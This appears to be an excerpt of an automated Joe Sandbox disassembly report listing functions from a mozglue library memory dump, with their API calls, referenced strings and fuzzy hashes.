                                                                  • Opcode ID: 3769b9ed158b7ec4bbfc5fbca99ed4b14dbd20f25369fa4dfa78ee9eff952a1b
                                                                  • Instruction ID: ec399eb558f9e5f14b8355e10e4db1a2d5d9202920748a2487488883766f4654
                                                                  • Opcode Fuzzy Hash: 3769b9ed158b7ec4bbfc5fbca99ed4b14dbd20f25369fa4dfa78ee9eff952a1b
                                                                  • Instruction Fuzzy Hash: 5A71D071A057008FDB14DF28C544BAAB7F9FF86308F159569E85987B61EB30B804CB92
                                                                  APIs
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C065E9D
                                                                    • Part of subcall function 6C075B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C0756EE,?,00000001), ref: 6C075B85
                                                                    • Part of subcall function 6C075B50: EnterCriticalSection.KERNEL32(6C0DF688,?,?,?,6C0756EE,?,00000001), ref: 6C075B90
                                                                    • Part of subcall function 6C075B50: LeaveCriticalSection.KERNEL32(6C0DF688,?,?,?,6C0756EE,?,00000001), ref: 6C075BD8
                                                                    • Part of subcall function 6C075B50: GetTickCount64.KERNEL32 ref: 6C075BE4
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C065EAB
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C065EB8
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C065ECF
                                                                  • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C066017
                                                                    • Part of subcall function 6C054310: moz_xmalloc.MOZGLUE(00000010,?,6C0542D2), ref: 6C05436A
                                                                    • Part of subcall function 6C054310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C0542D2), ref: 6C054387
                                                                  • moz_xmalloc.MOZGLUE(00000004), ref: 6C065F47
                                                                  • GetCurrentProcess.KERNEL32 ref: 6C065F53
                                                                  • GetCurrentThread.KERNEL32 ref: 6C065F5C
                                                                  • GetCurrentProcess.KERNEL32 ref: 6C065F66
                                                                  • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C065F7E
                                                                  • moz_xmalloc.MOZGLUE(00000024), ref: 6C065F27
                                                                    • Part of subcall function 6C06CA10: mozalloc_abort.MOZGLUE(?), ref: 6C06CAA2
                                                                  • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0655E1), ref: 6C065E8C
                                                                    • Part of subcall function 6C06CA10: malloc.MOZGLUE(?), ref: 6C06CA26
                                                                  • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0655E1), ref: 6C06605D
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0655E1), ref: 6C0660CC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                  • String ID: GeckoMain$3JT/
                                                                  • API String ID: 3711609982-2840169419
                                                                  • Opcode ID: 688200299b459c070aac9ac59d374d245517feb1c18f7f7b7bf26ff8874c0339
                                                                  • Instruction ID: f8e935a56f9f6c10036978e39ef96c8e7bf74ffe94fb45bdbb450d5846d1fb3d
                                                                  • Opcode Fuzzy Hash: 688200299b459c070aac9ac59d374d245517feb1c18f7f7b7bf26ff8874c0339
                                                                  • Instruction Fuzzy Hash: 0D719CB0A047809FDB10DF29C480B6ABBF0BF49304F54496DE98687B52DB31F948CB92
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0AD85F
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0AD86C
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0AD918
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0AD93C
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0AD948
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0AD970
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0AD976
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0AD982
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0AD9CF
                                                                  • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C0ADA2E
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0ADA6F
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0ADA78
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6C0ADA91
                                                                    • Part of subcall function 6C075C50: GetTickCount64.KERNEL32 ref: 6C075D40
                                                                    • Part of subcall function 6C075C50: EnterCriticalSection.KERNEL32(6C0DF688), ref: 6C075D67
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0ADAB7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1195625958-2178588373
                                                                  • Opcode ID: c322237b9ad55b9ee8e707fbefd0b08176bef1190678ec87257bc331f38593ed
                                                                  • Instruction ID: fc0799235a3f0fd179c3b1874a15d30b44086fb42d586327a47256ece1fb6990
                                                                  • Opcode Fuzzy Hash: c322237b9ad55b9ee8e707fbefd0b08176bef1190678ec87257bc331f38593ed
                                                                  • Instruction Fuzzy Hash: 9C719A756043049FCB00CFA9C888B9ABBF5FF89314F14856DEC5A9B352EB30A945CB91
                                                                  APIs
                                                                    • Part of subcall function 6C0531C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C053217
                                                                    • Part of subcall function 6C0531C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C053236
                                                                    • Part of subcall function 6C0531C0: FreeLibrary.KERNEL32 ref: 6C05324B
                                                                    • Part of subcall function 6C0531C0: __Init_thread_footer.LIBCMT ref: 6C053260
                                                                    • Part of subcall function 6C0531C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C05327F
                                                                    • Part of subcall function 6C0531C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C05328E
                                                                    • Part of subcall function 6C0531C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0532AB
                                                                    • Part of subcall function 6C0531C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0532D1
                                                                    • Part of subcall function 6C0531C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C0532E5
                                                                    • Part of subcall function 6C0531C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C0532F7
                                                                  • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C069675
                                                                  • __Init_thread_footer.LIBCMT ref: 6C069697
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C0696E8
                                                                  • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C069707
                                                                  • __Init_thread_footer.LIBCMT ref: 6C06971F
                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C069773
                                                                  • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C0697B7
                                                                  • FreeLibrary.KERNEL32 ref: 6C0697D0
                                                                  • FreeLibrary.KERNEL32 ref: 6C0697EB
                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C069824
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                  • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll$3JT/
                                                                  • API String ID: 3361784254-1673298729
                                                                  • Opcode ID: 0820cff92b91a37e9b5b58a65f4a947ab991414b03b49abd36dc326a25e45539
                                                                  • Instruction ID: f964135445d76dc33df5344ee20f8e97d210d288ad73f6cbe20a8ccaf6bb55c7
                                                                  • Opcode Fuzzy Hash: 0820cff92b91a37e9b5b58a65f4a947ab991414b03b49abd36dc326a25e45539
                                                                  • Instruction Fuzzy Hash: 0C61AF716043069BDF008FA9D884B9A7BF9EB4A714F158529FD1597F80DF30BA44CB91
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0AD4F0
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0AD4FC
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0AD52A
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0AD530
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0AD53F
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0AD55F
                                                                  • free.MOZGLUE(00000000), ref: 6C0AD585
                                                                  • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C0AD5D3
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0AD5F9
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0AD605
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0AD652
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0AD658
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0AD667
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0AD6A2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                  • String ID: 3JT/
                                                                  • API String ID: 2206442479-2178588373
                                                                  • Opcode ID: f0b3d9bf444389954f8645c387a5e1ce59a5e424315fa2b81c74c3a396d15a99
                                                                  • Instruction ID: 045685047430cd6b89afe7d6a65c1ce4454a73d1eea39c173121fd8bf3cf79fb
                                                                  • Opcode Fuzzy Hash: f0b3d9bf444389954f8645c387a5e1ce59a5e424315fa2b81c74c3a396d15a99
                                                                  • Instruction Fuzzy Hash: 1D5139B16047059FC704DF65C888A9ABBF4BF89318F108A2EE95A87711DB30B945CB91
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6C061213
                                                                  • toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C061285
                                                                  • memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6C0612B9
                                                                  • memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6C061327
                                                                  Strings
                                                                  • 3JT/, xrefs: 6C0611BC
                                                                  • TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6C0612AD
                                                                  • CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6C06131B
                                                                  • MZx, xrefs: 6C0611E1
                                                                  • &, xrefs: 6C06126B
                                                                  • Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6C06120D
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$toupper
                                                                  • String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32$3JT/
                                                                  • API String ID: 403083179-18453390
                                                                  • Opcode ID: 31c6f20af42ba6ff103d5aa59432a9ab857fb8b8e9ede9e5fddc7ea51797b48c
                                                                  • Instruction ID: e4950ee6d54b74d0e891b0cc59f3f84860d8a016f280d3bf897e158e9f7a7c2a
                                                                  • Opcode Fuzzy Hash: 31c6f20af42ba6ff103d5aa59432a9ab857fb8b8e9ede9e5fddc7ea51797b48c
                                                                  • Instruction Fuzzy Hash: 47718E71E053698ADB109F75D8007DEBBF5BF49309F04065AD546A3F40DB34BA88CB92
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C053217
                                                                  • GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C053236
                                                                  • FreeLibrary.KERNEL32 ref: 6C05324B
                                                                  • __Init_thread_footer.LIBCMT ref: 6C053260
                                                                  • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C05327F
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C05328E
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0532AB
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0532D1
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C0532E5
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C0532F7
                                                                    • Part of subcall function 6C08AB89: EnterCriticalSection.KERNEL32(6C0DE370,?,?,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284), ref: 6C08AB94
                                                                    • Part of subcall function 6C08AB89: LeaveCriticalSection.KERNEL32(6C0DE370,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284,?,?,6C0756F6), ref: 6C08ABD1
                                                                  • __aulldiv.LIBCMT ref: 6C05346B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
                                                                  • String ID: KernelBase.dll$QueryInterruptTime$3JT/
                                                                  • API String ID: 3006643210-3737765970
                                                                  • Opcode ID: 8bf3119c60814e2ebb8b7f270d51f4dc3cde1bc3b8555d98469d7d6e028261e8
                                                                  • Instruction ID: e09ed95da59a7d11a2522acbbadb5990520324ad00200b8cde28a1ab323c568d
                                                                  • Opcode Fuzzy Hash: 8bf3119c60814e2ebb8b7f270d51f4dc3cde1bc3b8555d98469d7d6e028261e8
                                                                  • Instruction Fuzzy Hash: 0961DE71A087418BCB11CF38C45175AB3F8FF8A354F618B1DF9A5A3A91EF30A5598B42
                                                                  APIs
                                                                  • InitializeCriticalSection.KERNEL32(6C0DF618), ref: 6C0B6694
                                                                  • GetThreadId.KERNEL32(?), ref: 6C0B66B1
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0B66B9
                                                                  • memset.VCRUNTIME140(?,00000000,00000100), ref: 6C0B66E1
                                                                  • EnterCriticalSection.KERNEL32(6C0DF618), ref: 6C0B6734
                                                                  • GetCurrentProcess.KERNEL32 ref: 6C0B673A
                                                                  • LeaveCriticalSection.KERNEL32(6C0DF618), ref: 6C0B676C
                                                                  • GetCurrentThread.KERNEL32 ref: 6C0B67FC
                                                                  • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C0B6868
                                                                  • RtlCaptureContext.NTDLL ref: 6C0B687F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                  • String ID: WalkStack64$3JT/
                                                                  • API String ID: 2357170935-2806194750
                                                                  • Opcode ID: dc13b501c917ffa1de3240081a52dbe1e8a8ca79f9fd2d712e3dc1cac4fd66eb
                                                                  • Instruction ID: d734fb8fbd06c50fa2b43864ccc66ae379ee58807ca508a8dbc1598728a9c33f
                                                                  • Opcode Fuzzy Hash: dc13b501c917ffa1de3240081a52dbe1e8a8ca79f9fd2d712e3dc1cac4fd66eb
                                                                  • Instruction Fuzzy Hash: BF517A71A09301AFDB15CF24C844B5EBBF8BF89714F04892DF999A7640DB71E908CB92
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C0DE768,?,00003000,00000004), ref: 6C053AC5
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE768,?,00003000,00000004), ref: 6C053AE5
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,00003000,00000004), ref: 6C053AFB
                                                                  • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C053B57
                                                                  • EnterCriticalSection.KERNEL32(6C0DE784), ref: 6C053B81
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE784), ref: 6C053BA3
                                                                  • EnterCriticalSection.KERNEL32(6C0DE7B8), ref: 6C053BAE
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE7B8), ref: 6C053C74
                                                                  • EnterCriticalSection.KERNEL32(6C0DE784), ref: 6C053C8B
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE784), ref: 6C053C9F
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE7B8), ref: 6C053D5C
                                                                  • EnterCriticalSection.KERNEL32(6C0DE784), ref: 6C053D67
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE784), ref: 6C053D8A
                                                                    • Part of subcall function 6C090D60: VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C053DEF), ref: 6C090D71
                                                                    • Part of subcall function 6C090D60: VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C053DEF), ref: 6C090D84
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Leave$Enter$Virtual$Free$Alloc
                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_CRASH()
                                                                  • API String ID: 2380290044-2272602182
                                                                  • Opcode ID: 9151d3293777db86911af3ba57c91779bd4a4eeb91108c8d5cec67618a11a3b8
                                                                  • Instruction ID: 58331c9a64e68f3690d876b6d3e1f52eab7c75abe89586a5831ba53adf67a314
                                                                  • Opcode Fuzzy Hash: 9151d3293777db86911af3ba57c91779bd4a4eeb91108c8d5cec67618a11a3b8
                                                                  • Instruction Fuzzy Hash: 9791AF71B002058BDB44CF68CAC476EB7F2FB89314FA54528E9259BB85DB71F920CB91
                                                                  APIs
                                                                  • AcquireSRWLockShared.KERNEL32 ref: 6C063BB4
                                                                  • ReleaseSRWLockShared.KERNEL32 ref: 6C063BD2
                                                                  • AcquireSRWLockExclusive.KERNEL32 ref: 6C063BE5
                                                                  • ReleaseSRWLockExclusive.KERNEL32 ref: 6C063C91
                                                                  • ReleaseSRWLockShared.KERNEL32 ref: 6C063CBD
                                                                  • moz_xmalloc.MOZGLUE ref: 6C063CF1
                                                                    • Part of subcall function 6C06CA10: malloc.MOZGLUE(?), ref: 6C06CA26
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Lock$ReleaseShared$AcquireExclusive$mallocmoz_xmalloc
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1881024734-2178588373
                                                                  • Opcode ID: a6001f72b514fa1ab1437a33a074a0b5886adb2bd6470174b53bebd31ca1c518
                                                                  • Instruction ID: e022974878da2ce1ef7026cac4b70433b369d281bba91e3996244c5425893c40
                                                                  • Opcode Fuzzy Hash: a6001f72b514fa1ab1437a33a074a0b5886adb2bd6470174b53bebd31ca1c518
                                                                  • Instruction Fuzzy Hash: 6AC17BB1908741CFC714DF29C08475ABBF5BF89318F158A5ED8998BB51DB30E885CB82
                                                                  APIs
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C064A68), ref: 6C09945E
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C099470
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C099482
                                                                    • Part of subcall function 6C099420: __Init_thread_footer.LIBCMT ref: 6C09949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09DE73
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09DF7D
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09DF8A
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09DFC9
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09DFF7
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C09E000
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C064A68), ref: 6C09DE7B
                                                                    • Part of subcall function 6C0994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0994EE
                                                                    • Part of subcall function 6C0994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C099508
                                                                    • Part of subcall function 6C08CBE8: GetCurrentProcess.KERNEL32(?,6C0531A7), ref: 6C08CBF1
                                                                    • Part of subcall function 6C08CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0531A7), ref: 6C08CBFA
                                                                  • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C064A68), ref: 6C09DEB8
                                                                  • free.MOZGLUE(00000000,?,6C064A68), ref: 6C09DEFE
                                                                  • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C09DF38
                                                                  Strings
                                                                  • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C09E00E
                                                                  • <none>, xrefs: 6C09DFD7
                                                                  • [I %d/%d] locked_profiler_stop, xrefs: 6C09DE83
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
